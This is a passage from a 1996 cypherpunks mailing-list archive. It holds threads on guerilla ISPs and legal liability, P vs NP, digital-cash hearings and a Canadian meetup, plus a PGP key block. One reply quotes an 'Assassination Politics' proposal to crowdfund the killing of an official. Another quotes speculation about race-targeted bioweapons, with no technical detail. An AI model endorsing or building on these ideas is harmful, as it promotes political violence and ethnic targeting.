this thread). This is not censorship. The sliencing of Fred Cohen by a lynch
mob of non-technicals (who, e.g., send e-mail twice) is a disturbing example
of censorship.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 2 Jan 1996 01:52:33 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Canadian Cypherpunks
Message-ID: <Pine.OSF.3.91.960101122304.7489A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



	Is there some interest in a meeting of Canadian Cypherpunks? If
you are a Canadian (or an American who is fortunate enough to live near
our sainted shores ;-)) send me a private E-mail message.
	Because Canada is such a big country, I propose that we start 
with a meeting in Toronto or area. If there is enough interest, I will 
arrange for a meeting place.

Regards, 
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 2 Jan 1996 05:00:22 +0800
To: tcmay@got.net (Timothy C. May)
Subject: p vs. np etc.
In-Reply-To: <ad0c14fb020210041a1c@[205.199.118.202]>
Message-ID: <199601012034.MAA28180@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM:
>There is no point in the back-and-forth of insults, "Dr. Fred is a loon,"
>"Alice is Detweiler," and other such nonsense. If you don't want to read
>the comments of Fred Cohen, Dimitri Vulis, Alice whatever,
>Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete
>them immediately, read them briefly, whatever.

this of course would be obvious to anyone without an ego. however because
this list is really "war of the egos", it escapes everyone here (and has
for the entire existence of the list). far more fun to yell at someone 
publicly, esp. through a pseudonym.

interesting too how some people who use pseudonyms still cannot avoid
defending themselves when attacked. it appears that pseudonyms do not
dissociate ego-based psychology from communication. in fact to the contrary
they appear to make it more prevalent.

this would be an interesting area to study. ripe with lots of seething,
semi-conscious feelings and attitudes deep within the psyche. Freud would
have a field day with flamewars, trolls, and pseudonyms.

> I'm not convinced there's much more about the
>_theory_ of viruses to "push forward," for various reasons. The theory was
>laid out, some Bulgarians and others are busily writing viruses, but
>there's not likely to be some whole reservoir of new theory to be worked
>on.

I object. this sounds like the 1890 patent worker who suggested the patent
office be shut down because, after all, all the important inventions had
already been invented. you are careful to attribute your opinion only
to yourself, but you must recognize how dangerous speculation about the
future is, if you wish to preserve your credibility in the long run. 
especially sentences that sound like, "there is not much more to be
uncovered in so-and-so area" tend to sound especially foolish from future
perspectives.

the Virus area is in fact ripe with study. Java is actually a language 
designed to prevent viruses. many have proposed operating systems for
computers that may work like the way computer viruses spread. I predict
that virus study is really going to blossom even more once Java or other
similar languages become more entrenched and "distributed computing"
really comes to the fore.

>(This is true of a lot of fields, where the work done decades ago
>basically was complete....look at how we all cite Garey and Johnson and how
>little has changed in the field of NP-completeness.)

whoa, you are way off here. NP vs. P is a field *ripe* with new studies.
what these pioneers did was map out the terrain. but there are still many
*unresolved* areas of research here. P vs. NP is *entirely* unresolved.
that doesn't mean that someone has come up with an answer and everyone
says, "the field is basically complete". what it means is that a bazillion
researchers are dying to know the answers to tough questions posed by
the pioneers decades ago. it is true there is little progress in some
key areas, but only because the problems are so insanely difficult.

 the work is only "complete" in the sense that
it has posed questions that have not required any modification-- they
are still the hardest in all of mathematics and computer science, and
still not solved.

are you aware of how critical the P vs. NP question is to cryptography?
theoretically public key cryptography and many other forms in common use
today would be "impossible" if P= NP. I've met some very good cryptographers
who don't understand this basic point of computer theory. they think one
can always just create more ingenious algorithms.

>Blasting Cohen because you don't think he carried his work far enough is
>clearly blasting wildly. Have you asked whether others on this list have
>carried the work they did in their early careers far enough? (Did I carry
>my work in the 1970s on alpha particle effects on chips far enough, or am I
>just a Cohen-like slacker because I moved on to other things?)

uhm, I have to side with PM on this one -- I vote for 40-something slacker. <g>

>So why don't I just do this? Well, I do have a filter file in my Eudora Pro
>mailer, and I use it. But I still see the crossfire on the list, the
>pointless flames and personal attacks. This angers and saddens me. Hence
>this message.

the noise is a periodic reoccurence because of the basic list architecture.
personally I enjoy it immensely. it's all the grandeur and muck of
seething human psychology in digital form.  no amount of continual 
concerned messages will ever change the basic fact that the list architecture
by design is highly conducive to noise. to complain about this is like
complaining that cars emit exhaust. well, yes, but that's the basic design.
you can't get rid of the exhaust until you experiment with a new design.

I'm actually not necessarily in favor of a new design here either, even
though I have suggested variations/alternatives frequently. as I say, I
enjoy it here a lot.

> The recent increase in "one-sentance
>repartee" is indicative of late-stage list meltdown. (Some of the posts
>here quote a couple of paragraphs, add one or two lines of insults, then
> have another screenful of PGP sigs, auto-signing sigs, anonymous IDs, and
>then a conventional sig. Jeesh!)

hee, hee. "meltdown". love that term. but again you mix big egos and
a totally open list (throw in a little cryptoanarchy for more explosive
force), and this is the inevitable result. there's nothing
perplexing or mystifying why this happens. its the basic conclusion 
reaffirmed zillions of times by many years of this list activity.

to complain about this reminds me of person who murdered his parents
and then pleads to the court that he was an orphan who deserves relief.
that is, this situation here is the creation of everyone who participates,
and those who suffer are precisely those that created it. cyberspatial
karma if you will.

>I'm hoping that this is just a Xmas vacation silly season.

well you can always post a exasperated message in which you declare you've
had it with the list, period, and are not going to hang out here any more.
there is a precedent for that kind of thing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 2 Jan 1996 02:49:31 +0800
To: John Young <jya@pipeline.com>
Subject: Re: SEY_use
In-Reply-To: <199512311518.KAA19667@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960101130852.20748E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


SEY_use

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 05:31:16 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Guerilla Internet Service Providers
Message-ID: <v02120d08ad0dfcded03a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:17 1/1/96, Mike McNally wrote:

>Seems to me at as soon as things like a general-purpose browser (and
>associated TCP/IP stack & PPP or SLIP) becomes as easy to load up as
>an AOL demo disk, and local ISP's are listed in the yellow pages, the
>advantage of being able to pay a provider for nothing more than the
>routing of IP packets so that the net as a whole can be explored (and,
>perhaps, more services purchased) will FAR outweigh any of the goodies
>the current big providers offer.

But how many of them will be willing to forward certain newsgroups if doing
so carries a mandatory 10 year prison term? Hint: count the number of
narcotics dealers that advertize in your local yellow pages.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 06:29:28 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Guerilla Internet Service Providers
Message-ID: <v02120d09ad0e047046b5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:14 1/1/96, Mike McNally wrote:
>Lucky Green writes:
> > But how many of them [ IP providers ] will be willing to forward
> > certain newsgroups if doing so carries a mandatory 10 year prison
> > term? Hint: count the number of  narcotics dealers that advertize
> > in your local yellow pages.
>
>But an IP provider doesn't have to know that it's "forwarding" *any*
>newsgroups; all it has to know is that IP packets are moving between
>my PC and the outside world.  It doesn't have any way of knowing what
>those packets contain and doesn't want to.

Some site in physical space has to host the nntpd, the ftpd, and the httpd.
That site will be subject to search, seizure, and arrest and conviction of
owner.

If you don't have a host, there won't be any packets to forward.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markh@wimsey.bc.ca (Mark C. Henderson)
Date: Tue, 2 Jan 1996 06:36:54 +0800
To: cypherpunks@toad.com
Subject: Re: Canadian Cypherpunks [NOISE]
Message-ID: <m0tWs3h-000A4QC@vanbc.wimsey.com>
MIME-Version: 1.0
Content-Type: text/plain


>         Is there some interest in a meeting of Canadian Cypherpunks? If
> you are a Canadian (or an American who is fortunate enough to live near
> our sainted shores ;-)) send me a private E-mail message.
>         Because Canada is such a big country, I propose that we start 
> with a meeting in Toronto or area. If there is enough interest, I will 
> arrange for a meeting place.

I don't think it is any more practical to have "Canadian Cypherpunks"
meetings than "U.S. Cypherpunks" meetings. Call them what they are, i.e.
regional meetings, (e.g. areas around Toronto, Montreal, Vancouver,
Quebec, Calgary-Edmonton, etc.), but I suspect that most people are
unlikely to travel in excess of 3000km for meetings which last a few
hours. For example, I expect that Vancouverites are much more likely to
travel to Seattle for a meeting than to Toronto.

My point is, don't advertise what is really a Southern Ontario regional
meeting as the meeting of "Canadian Cypherpunks". This would be like
calling the S.F. Bay Area meetings the "U.S. Cypherpunks meetings".


-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.6.1.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wink Junior <winkjr@teleport.com>
Date: Tue, 2 Jan 1996 06:44:15 +0800
To: cypherpunks@toad.com
Subject: CSPAN Currency Creation Hearings
Message-ID: <199601012202.OAA02434@kelly.teleport.com>
MIME-Version: 1.0
Content-Type: text


Dave Feustel <feustel@netcom.com> on talk.politics.crypto mentioned that
on Saturday morning CSPAN was broadcasting congressional hearings on
"currency creation, during which smartcards, Ecash, encryption, privacy and
government regulation of all of the above were discussed."  There's supposed
to be at least one rebroadcast.

A brief review of the highlights would be very interesting.

Wink

--
winkjr@teleport.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 2 Jan 1996 04:44:09 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Guerilla Internet Service Providers
In-Reply-To: <ad0b11c0300210046f19@[205.199.118.202]>
Message-ID: <9601012017.AA15101@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
 > And support your local ISPs!
 > 
 > (Or, even better, direct connection to the Net, though this is harder for
 > most of us to arrange.)

For how long is this really going to be the case?  As the whole world
of HTTP and related things (like Java & VRML) advances in capability
and sophistication, how long will the Compuserve/AOL/Genie "Big Online
Service" model continue to make sense?

Seems to me at as soon as things like a general-purpose browser (and
associated TCP/IP stack & PPP or SLIP) becomes as easy to load up as
an AOL demo disk, and local ISP's are listed in the yellow pages, the
advantage of being able to pay a provider for nothing more than the
routing of IP packets so that the net as a whole can be explored (and,
perhaps, more services purchased) will FAR outweigh any of the goodies
the current big providers offer.

The flip side of that, of course, is that big service providers can
offer access to their goodies to anybody with net access.

That sort of setup would make the whole concept of Internet regulation
even more bizarre; we'd really have something more directly parallel
to the phone system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 2 Jan 1996 04:10:25 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Deterrence"
Message-ID: <v02140a00ad0da3196082@[165.254.158.218]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:17 12/29/95, jim bell wrote:

>In my essay, "Assassination Politics," I pointed out that it would be
>relatively easy to deter such official-type actions if enough of us simply
>said, "NO!" and denominated it in terms of dollars and cents.  After all,
>with four million Compuserve users, if they each were willing to donate a
>penny to see this latter-day Fuhrer dead, that would be $40,000.  (Pardon me
>if I don't translate this into marks and other currencies.)
[snip]
>WHEN, exactly, would it be appropriate to act?

This reminds me of a Science Fiction story by H. Beam Piper called "A
Planet for Texans" where as part of the laws of the planet (and the oath of
office) was a statement that the politician was representing the interests
of ALL of their constituents. Every constituent had the legal right (and
duty) to register any protests of the politician's actions _in-person_ with
said politician. Such protest could take any form up-to-and-including
killing the SOB on the spot. In the story, this right was illustrated by a
small farmer being charged will killing a Senator by hacking him to death
with a machete (all legal protests are required to be registered in person
and use of long range techniques such as car-bombs or snipping with rifles
is not regarded as a valid protest) and we are shown his trial. The charge
is not killing the Senator (which is by law the farmer's right since he
felt that the Senator was violating his oath of office by misrepresenting
him) but whether, in exercising this right, he used excessive force out of
proportion to the actions that was being protested.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 2 Jan 1996 04:11:47 +0800
To: jonnyx <jonnyx@edge.edge.net>
Subject: Re: (NOISE) Re: PLA_gue  Germ Terrorism
Message-ID: <v02140a01ad0daa891fe1@[165.254.158.218]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:54 12/30/95, jonnyx wrote:

>
>Think that's fun? How 'bout this: given that the initial "mapping"
>phase of the human genome project is nearly complete, and the huge
>amount of genetic information available on the net, PLUS ever-
>more-powerful-yet-less-costly computers anyone can purchase, just
>how long do y'all think it'll be before some nut whips up a bug
>that targets, say, people with negroid genetic characteristics?
>Or epicanthic folds? Or blonde hair?


This reminds me of a 1940's Novel by Science Fiction Author Robert A.
Heinlein called "Sixth Column." In it the US has been conquered by an
invasion from Asia and the resistance (such as it is) is a small Top Secret
hidden US Army research center with some equipment that can act on people
based on their genetic makeup. Thus when it is time to go after the
invaders, it is done with guns that kill only Asians but have no effect on
anyone-else.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 07:39:22 +0800
To: Andreas Bogk <andreas@horten.artcom.de>
Subject: Re: Guerilla Internet Service Providers
Message-ID: <v02120d01ad0e19ebf771@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:30 1/1/96, Andreas Bogk wrote:

>So I guess we'll need some computers in outer space, on offshore boats
>or in well-bribed stable dictatorships.

o Outer space: not very realistic
o Offshore boats: see the fate of drug trafficers in international waters
after the Coast Guard is through with them.
o Stable dictatorships: Not stable enough to withstand an humanitarian
mission by the US Army.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 2 Jan 1996 05:47:56 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <v02120d08ad0dfcded03a@[192.0.2.1]>
Message-ID: <9601012114.AA15133@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
 > But how many of them [ IP providers ] will be willing to forward
 > certain newsgroups if doing so carries a mandatory 10 year prison
 > term? Hint: count the number of  narcotics dealers that advertize
 > in your local yellow pages. 

But an IP provider doesn't have to know that it's "forwarding" *any*
newsgroups; all it has to know is that IP packets are moving between
my PC and the outside world.  It doesn't have any way of knowing what
those packets contain and doesn't want to.

The Internet is more than news, FTP, the web, and so on primarily
because it's so much *less*.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Felix Lee <flee@teleport.com>
Date: Tue, 2 Jan 1996 08:06:09 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <v02120d09ad0e047046b5@[192.0.2.1]>
Message-ID: <199601012332.PAA10533@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green:
> Some site in physical space has to host the nntpd, the ftpd, and the httpd.
> That site will be subject to search, seizure, and arrest and conviction of
> owner.

but if it turns out that 30% of home PCs have to be seized to prevent
dissemination of dangerous-information-X?

though we're not quite there yet... eg, it's a little expensive to run
your own httpd 24 hours/day.
--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 09:09:15 +0800
To: Felix Lee <cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <v02120d00ad0e2f369fc7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:32 1/1/96, Felix Lee wrote:
>Lucky Green:
>> Some site in physical space has to host the nntpd, the ftpd, and the httpd.
>> That site will be subject to search, seizure, and arrest and conviction of
>> owner.
>
>but if it turns out that 30% of home PCs have to be seized to prevent
>dissemination of dangerous-information-X?

Wrong. Only 0.03% of the home PCs have to be seized and the owners
incarcerated. The remaining users will cease to carry controlled data on
their own.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 09:09:30 +0800
To: Brad Dolan <winkjr@teleport.com>
Subject: Re: CSPAN Currency Creation Hearings
Message-ID: <v02120d01ad0e3032db00@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:04 1/1/96, Brad Dolan wrote:
>I caught part of it.
>
>The general theme was,~"we're going to establish a `partnership' with
>digicash / crypto firms to ensure that our `legitimate law-enforcement
>needs' are designed into the products."~

I sincerely doubt that there will be any 'partnerships' between DigiCash
and law enforcement.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Tue, 2 Jan 1996 07:20:27 +0800
To: cypherpunks@toad.com
Subject: Re: Who sent me this message?
Message-ID: <199601012250.QAA04037@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>:-) As I can see. How did you generate this key? Are you using a
>special version of PGP?
>
Well I didn't send the message but I also use an undocumented larger key
with PGP.  Read it in the book a friend got.

(andr0id@midwest.net  callsign: N9XLM)
( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 2 Jan 1996 18:40:46 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <v02120d09ad0e047046b5@[192.0.2.1]>
Message-ID: <199601020114.RAA06256@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Some site in physical space has to host the nntpd, the ftpd, and the httpd.
> That site will be subject to search, seizure, and arrest and conviction of
> owner.

	Said site, however, can be located in a different jurisdiction
than the laws.

-- 
sameer						Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 18:40:55 +0800
To: sameer <sameer@c2.org>
Subject: Re: Guerilla Internet Service Providers
Message-ID: <v02120d04ad0e3a092ac7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:14 1/1/96, sameer wrote:
>> Some site in physical space has to host the nntpd, the ftpd, and the httpd.
>> That site will be subject to search, seizure, and arrest and conviction of
>> owner.
>
>        Said site, however, can be located in a different jurisdiction
>than the laws.

Seems to me that the laws are becomming unified on a global scale. The
people in power all over the world have the same interests. To stay in
power. The 'unregulated' Internet is in direct confilict with this
interest. Since these powers make the laws, they will use the laws to
reduce the threat the present day Internet presents.

Will C2 carry certain newsgroups/info after doing so has become a felony?
Who wants to be an 'illegal data' kingpin and face execution? (Kingpins are
'data trafficers' that carry more than 1.5 Megs of 'controlled
information'.)

-- Lucky

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 2 Jan 1996 08:14:10 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <199601012358.RAA01029@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From owner-cypherpunks@toad.com Mon Jan  1 17:53:37 1996
> Message-Id: <199601012332.PAA10533@desiree.teleport.com>
> Subject: Re: Guerilla Internet Service Providers 
> To: cypherpunks@toad.com
> In-Reply-To: Your message of Mon, 01 Jan 1996 13:41:13 PST.
>              <v02120d09ad0e047046b5@[192.0.2.1]> 
> Date: Mon, 01 Jan 1996 15:32:37 -0800
> From: Felix Lee <flee@teleport.com>
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> Lucky Green:
> > Some site in physical space has to host the nntpd, the ftpd, and the httpd.
> > That site will be subject to search, seizure, and arrest and conviction of
> > owner.
> 
> but if it turns out that 30% of home PCs have to be seized to prevent
> dissemination of dangerous-information-X?
> 
> though we're not quite there yet... eg, it's a little expensive to run
> your own httpd 24 hours/day.
> --
> 

If you live in the Austin, TX area I will setup a dedicated slip for you at
only $100/mo.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joee@li.net (j. ercole)
Date: Tue, 2 Jan 1996 07:48:57 +0800
To: cypherpunks@toad.com
Subject: Prevention Of Trauma 2 [NOISE]
Message-ID: <v01510100ad0e1b49a75c@[199.173.75.139]>
MIME-Version: 1.0
Content-Type: text/plain


[Here's something scary to start your new year. . . ]


<< start of forwarded material >>

 ** Date:         Mon, 1 Jan 1996 23:41:38 -0000
 ** Reply-To: "POLI-PSY    [  Political Science-Psychology/Psychiatry  ]"
 **               <POLI-PSY@SJUVM.STJOHNS.EDU>
 ** Sender: "POLI-PSY    [  Political Science-Psychology/Psychiatry  ]"
 **               <POLI-PSY@SJUVM.STJOHNS.EDU>
 ** From: Michael Benjamin <pmhil@SHANI.NET>
 ** Subject:      Prevention Of Trauma 2
 ** X-To:         Multiple recipients of list FORENSIC-PSYCHOLOGY
 **               <FORENSIC-PSYCHOLOGY@SJUVM.STJOHNS.EDU>,
 **               Multiple recipients of list LEGALTEN
 **               <LEGALTEN@SJUVM.STJOHNS.EDU>,
 **               Stress Traumatic <traumatic-stress@netcom.com>
 ** X-cc:         Multiple recipients of list TRANSCULTURAL-PSYCHOLOGY
 **               <TRANSCULTURAL-PSYCHOLOGY@VM1.NoDak.EDU>,
 **               Traumatic Stress Forum <traumatic-stress@netcom.com>
 ** To: Multiple recipients of list POLI-PSY <POLI-PSY@SJUVM.STJOHNS.EDU>
 **
 ** PREVENTION TRAUMA II
 **
 **         In a previous letter I pointed out the need to eliminate
 ** trauma by prevention. I mentioned that there are generally Agencies
 ** whose function is to prevent trauma, if it is in industry, military,
 driving,
 ** etc. These agencies have criteria for excluding people who they feel
 ** are liable to mal-function and cause trauma (danger). Often these
 ** Agencies employ programs to reduced the likelihood of trauma.
 **         I pointed out that I feel it is legitimate to help these Agencies
 ** not in defining their criteria but in eliciting the given criteria by
 the use
 ** of the techniques which are used in a Diagnostic Setting. I emphasize
 ** that the presence or absence of these criteria are not indicative of any
 ** pathology. As such I feel that this discussion does not only belong in
 ** the field of Forensic Psychiatry but is a legitimate form of treating
 ** trauma, i.e. prevention.
 **         In the field of Road Safety in Israel the Institute for Road
 ** Safety is a medical institute which advises on likelihood of a driver to
 ** be dangerous.
 **         The examination is carried out on all applicants for a Public
 ** License (taxi, autobus), heavy vehicle drivers, and drivers involved in
 ** fatal accidents, and drivers or prospective drivers who have had
 ** contact with Mental Health Care. Generally the exams are given by
 ** Psychologists and are based partially on the M.M.P.I. and a clinical
 ** examination. More difficult cases are referred to Consultant
 ** Psychiatrists and an Ad-Hoc Committee.
 **         The criteria under discussion are mainly:- Concentration,
 ** Attention, Projectivity, Judgment, Consistency, Reality Jesting, Ability
 ** to identify , Confirm with instructions, Impulsivity and Control over
 ** Impulsivity.
 **         Over the years we have found these to be of primary
 ** importance and we thus concentrate on illnesses or personality
 ** disturbance where these criteria may well occur.
 **         If these indications are discovered we check if they are
 ** causing driving delinquency. If so, we then determine if there is a
 ** reasonable likelihood of the patient / examinee being made to
 ** understand and correct himself. Obviously in some instances this is of
 ** little likelihood. If these indications are present or applying for a new
 ** license, the application is rejected. If we allow a "trial" period, the
 ** position is first explained to the examinee, and we try and ascertain if it
 ** at all possible that he both understands and is able of "changing his
 ** ways".
 **         In addition to the "meeting point" between Forensic
 ** Psychiatry and "Preventive" Traumatology we feel that we are on the
 ** delicate meeting point of "Personal Rights" and Societies "Right to
 ** defend itself".
 **         We are under perpetual scrutiny, which I feel is justified and
 ** healthy. I would very much enjoy any comments or suggestions.
 **
 **
 **         Michael.

<< end of forwarded material >>



j. ercole <joee@li.net>
ny, usa
pgp public key at: http://www.li.net/~joee/index.html
$$$$$$$$$$$$$$$$********************&&&&&&&&&&&&&&&&&
Stand By---.sig presently being unearthed in regression therapy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 11:08:52 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla ISP's...
Message-ID: <v02120d08ad0e4ca3891f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:19 1/1/96, Jim Choate wrote:
>Has anyone looked at operating systems like Plan 9 which divide the services
>into 3 sets (terminal, file, process) and then distribute them over various
>machines (and cpu's in multi-cpu systems) on a 'cost' basis?
>
>This would effectively address the issue of where named, httpd, or whatever
>was running. Mainly because it would never run on the same machine (or cpu)
>each time or necessarily all the time (ie run a while here then over there).

That is called a conspiracy. The consequence is that all machines involved
will be confiscated and their respective owners jailed.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 2 Jan 1996 08:27:06 +0800
To: Wink Junior <winkjr@teleport.com>
Subject: Re: CSPAN Currency Creation Hearings
In-Reply-To: <199601012202.OAA02434@kelly.teleport.com>
Message-ID: <Pine.SOL.3.91.960101190131.27362A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I caught part of it.

The general theme was,~"we're going to establish a `partnership' with 
digicash / crypto firms to ensure that our `legitimate law-enforcement 
needs' are designed into the products."~ 

bd

On Mon, 1 Jan 1996, Wink Junior wrote:

> Dave Feustel <feustel@netcom.com> on talk.politics.crypto mentioned that
> on Saturday morning CSPAN was broadcasting congressional hearings on
> "currency creation, during which smartcards, Ecash, encryption, privacy and
> government regulation of all of the above were discussed."  There's supposed
> to be at least one rebroadcast.
> 
> A brief review of the highlights would be very interesting.
> 
> Wink
> 
> --
> winkjr@teleport.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
